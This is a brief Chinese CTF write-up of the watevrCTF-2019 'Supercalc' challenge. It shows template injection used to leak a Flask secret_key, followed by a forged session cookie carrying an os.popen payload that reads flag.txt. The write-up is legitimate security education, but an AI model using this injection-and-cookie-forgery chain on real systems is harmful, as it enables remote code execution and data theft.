[watevrCTF-2019]Supercalc

进入之后发现是一个计算器,进行fuzz。
试出来在1/0报错后面用#注释并且进行SSTI可以进行回显。
显示{{config}}得到secret_key。
但是发现没办法进一步注入。
查看cookie:发现每次都在变化。
用flask-session-decode解密发现固定格式。
用secret解密后直接打入payload:

encode -s "cded826a1e89925035cc05f0907855f7" -t "{'history':[{'code': '__import__(\"os\").popen(\"cat flag.txt\").read()'}]}"

改cookie刷新
得到flag

推荐文章